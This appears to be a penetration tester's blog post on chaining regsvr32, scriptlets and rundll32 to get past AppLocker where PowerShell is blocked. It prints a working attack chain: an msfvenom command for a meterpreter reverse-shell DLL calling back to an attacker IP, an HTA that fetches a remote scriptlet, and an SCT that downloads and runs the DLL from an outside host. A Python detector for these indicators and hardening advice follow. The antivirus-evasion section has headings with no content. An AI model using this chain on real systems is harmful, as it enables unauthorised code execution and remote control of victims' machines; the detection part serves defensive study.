Elliot Speck Disk Space Invader

Chaining to Bypass AppLocker Without PowerShell

One of the services we provide at work is a “human factor penetration test”, or a social engineering engagement. We position ourselves as an attacker and treat the engagement as a pure red-team exercise: we attempt to gain access to the corporate environment without being given any knowledge of its inner workings. Generally speaking, environments either do not have AppLocker or any other form of application whitelisting enabled, and/or have PowerShell enabled for use by all users. Recently, I encountered an environment where both of these were false. Luckily (well, for an attacker), I found it was possible to chain a number of previously known techniques together in order to bypass both in one fell swoop.

Generate Payload:

msfvenom -p windows/meterpreter/reverse_tcp EXITFUNC=thread LHOST=111.111.111.111 LPORT=443 -a x86 -f dll -o out.dll

Your .HTA file:

<html>
	<head>
		<script language="VBScript">
			window.moveTo -4000, -4000
			Set objShell = CreateObject("Wscript.Shell")
			objShell.Run("regsvr32 /u /n /s /i:https://your-domain.com/sct.sct scrobj.dll")
			window.close()
		</script>
	</head>
</html>

Your .SCT file:

<?XML version="1.0"?>
<scriptlet>
	<registration progid="ProgramID" classid="{10001111-0000-0000-0000-0000FEEDACDC}">
		<script language="VBScript">
			<![CDATA[
				Set FSO = CreateObject("Scripting.FileSystemObject")
				Set TMPDir = FSO.GetSpecialFolder(2)

				DLLDir = TMPDir & "\" & FSO.GetTempName()
				FSO.CreateFolder(DLLDir)
				OutFile = DLLDir & "\" & "MSFDLL.dll"

				Dim XMLHTTP
				Dim ByteStream

				Set XMLHTTP = CreateObject("Microsoft.XMLHTTP")
				Set ByteStream = CreateObject("ADODB.Stream")

				XMLHTTP.Open "GET", "https://your-domain.com/path/to/your/dll.dll", False
				XMLHTTP.Send

				With ByteStream
				    .Type = 1
				    .Open
				    .Write XMLHTTP.ResponseBody
				    .SaveToFile OutFile
				End With

				Set WSS = CreateObject("Wscript.Shell")
				WSS.Run "C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL " & OutFile, 0, true
			]]>
		</script>
	</registration>
</scriptlet>
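The chain above leaves a recognisable trail in process-creation telemetry: mshta.exe spawning regsvr32.exe with `/i:` pointing at an http(s) URL and `scrobj.dll`, followed by rundll32.exe invoking `shell32.dll,Control_RunDLL` on a DLL that was just written to the user's temp folder. The following is an added example written for this post, not code from the original, that scans constructed, simplified Sysmon-style process-creation records (`parent_image|image|command_line`) for those three indicators. The record format, the rule names and the sample lines are assumptions made for the example.

```python
import re
from typing import Callable, List, Tuple

# Constructed sample records in a simplified "parent_image|image|command_line" layout.
# These are made-up lines for the example, not real telemetry from any environment.
SAMPLE_EVENTS = [
    # regsvr32 pulling a remote scriptlet, launched from an HTA (the first hop of the chain)
    "C:\\Windows\\System32\\mshta.exe|C:\\Windows\\System32\\regsvr32.exe|"
    "regsvr32 /u /n /s /i:https://your-domain.com/sct.sct scrobj.dll",
    # rundll32 loading a DLL dropped into the user's temp folder (the last hop of the chain)
    "C:\\Windows\\System32\\regsvr32.exe|C:\\Windows\\System32\\rundll32.exe|"
    "C:\\Windows\\System32\\rundll32.exe shell32.dll,Control_RunDLL "
    "C:\\Users\\alice\\AppData\\Local\\Temp\\rad1A2B3.tmp\\MSFDLL.dll",
    # benign: a vendor installer registering a COM DLL from Program Files
    "C:\\Windows\\explorer.exe|C:\\Windows\\System32\\regsvr32.exe|"
    "regsvr32 /s \"C:\\Program Files\\Vendor\\vendor.dll\"",
    # benign: Control Panel applet opened the normal way
    "C:\\Windows\\explorer.exe|C:\\Windows\\System32\\rundll32.exe|"
    "rundll32.exe shell32.dll,Control_RunDLL C:\\Windows\\System32\\intl.cpl",
]

# Regexes for the two command-line shapes used by the chain. Paths are matched
# case-insensitively because Windows is.
REMOTE_SCRIPTLET_RE = re.compile(r"/i:\s*https?://", re.I)
TEMP_DIR_RE = re.compile(r"\\(AppData\\Local\\Temp|Windows\\Temp)\\", re.I)

Rule = Tuple[str, Callable[[str, str, str], bool]]

RULES: List[Rule] = [
    # regsvr32 registering a scriptlet fetched over HTTP(S) via scrobj.dll
    ("regsvr32_remote_scriptlet",
     lambda parent, image, cmd: image.lower().endswith("regsvr32.exe")
     and REMOTE_SCRIPTLET_RE.search(cmd) is not None
     and "scrobj.dll" in cmd.lower()),
    # rundll32 Control_RunDLL pointed at a DLL under a user-writable temp directory
    ("rundll32_control_rundll_temp",
     lambda parent, image, cmd: image.lower().endswith("rundll32.exe")
     and "control_rundll" in cmd.lower()
     and TEMP_DIR_RE.search(cmd) is not None),
    # an HTML Application host spawning regsvr32 at all is unusual for end users
    ("mshta_parent_of_regsvr32",
     lambda parent, image, cmd: parent.lower().endswith("mshta.exe")
     and image.lower().endswith("regsvr32.exe")),
]


def parse_event(line: str) -> Tuple[str, str, str]:
    """Split one record into (parent_image, image, command_line).

    The command line may itself contain '|' (it does not here, but be safe),
    so split on the first two separators only.
    """
    parent, image, cmd = line.split("|", 2)
    return parent.strip(), image.strip(), cmd.strip()


def scan(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (rule_name, command_line) for every rule that fires on every record."""
    findings: List[Tuple[str, str]] = []
    for line in lines:
        parent, image, cmd = parse_event(line)
        for name, predicate in RULES:
            if predicate(parent, image, cmd):
                findings.append((name, cmd))
    return findings


if __name__ == "__main__":
    for rule_name, command_line in scan(SAMPLE_EVENTS):
        print(f"[{rule_name}] {command_line}")
```

Running the script flags only the two chain records (three findings in total, since the regsvr32 record matches both the remote-scriptlet rule and the mshta-parent rule) and leaves the vendor installer and the Control Panel applet alone. The durable fix is not the detector but the policy: AppLocker's default rules allow everything under `C:\Windows`, which is exactly why signed LOLBins such as regsvr32.exe and rundll32.exe carry the payload here, so environments that rely on whitelisting should restrict those binaries for ordinary users alongside the PowerShell restriction they already have.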

However, some antivirus products detect this, so let’s go one stage deeper and add some mitigations to their mitigations, no?

– BASE64 ENCODING EXAMPLE

Why:

Mitigations:

Neat, huh? Having this “just work” would be - obviously - irresponsible. While you could copy and paste this code, edit the template a touch, and push it to a server and have it work, modern antivirus will detect the HTA file as being malware. It’s an exercise for the reader as to how to mitigate this.